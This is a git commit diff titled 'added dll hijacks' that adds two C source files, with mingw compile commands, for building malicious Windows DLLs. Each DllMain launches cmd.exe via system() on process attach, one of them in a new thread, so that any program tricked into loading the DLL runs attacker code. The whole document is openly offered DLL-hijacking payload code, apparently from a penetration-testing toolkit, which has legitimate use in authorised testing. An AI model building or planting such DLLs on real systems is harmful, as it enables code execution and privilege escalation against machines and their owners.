added dll hijacks

2 files changed, 58 insertions, 0 deletions

diff --git a/dll_hijack.c b/dll_hijack.c
new file mode 100644
index 0000000..547098e
--- /dev/null
+++ b/dll_hijack.c
@@ -0,0 +1,29 @@
+/*
+   Compile with:
+
+   i686-w64-mingw32-g++ dll_hijack.c -lws2_32 -shared -o hijack.dll
+   x86_64-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll
+   i686-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll
+*/
+
+#include <windows.h>
+
+void Entry () {
+    system("cmd.exe");
+    //WinExec("cmd.exe", 0);
+}
+
+BOOL WINAPI DllMain (HANDLE hModule, DWORD dwReason, LPVOID lpReserved) {
+    switch(dwReason) {
+        case DLL_PROCESS_ATTACH:
+            Entry();
+            break;
+        case DLL_PROCESS_DETACH:
+            break;
+        case DLL_THREAD_ATTACH:
+            break;
+        case DLL_THREAD_DETACH:
+            break;
+    }
+    return TRUE;
+}
diff --git a/dll_hijack_thread.c b/dll_hijack_thread.c
new file mode 100644
index 0000000..9c205b3
--- /dev/null
+++ b/dll_hijack_thread.c
@@ -0,0 +1,29 @@
+/*
+   Compile with:
+
+   i686-w64-mingw32-gcc dll_hijack_thread.c -shared -lws2_32 -o hijack.dll
+*/
+
+#include <windows.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+void Entry () {
+    system("cmd.exe");
+    //WinExec("cmd.exe", 0);
+}
+
+BOOL APIENTRY DllMain (HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
+    switch (dwReason) {
+        case DLL_PROCESS_ATTACH:
+            CreateThread(0,0,(LPTHREAD_START_ROUTINE)Entry,0,0,0);
+            break;
+        case DLL_PROCESS_DETACH:
+            break;
+        case DLL_THREAD_DETACH:
+            break;
+        case DLL_THREAD_ATTACH:
+            break;
+    }
+    return TRUE;
+}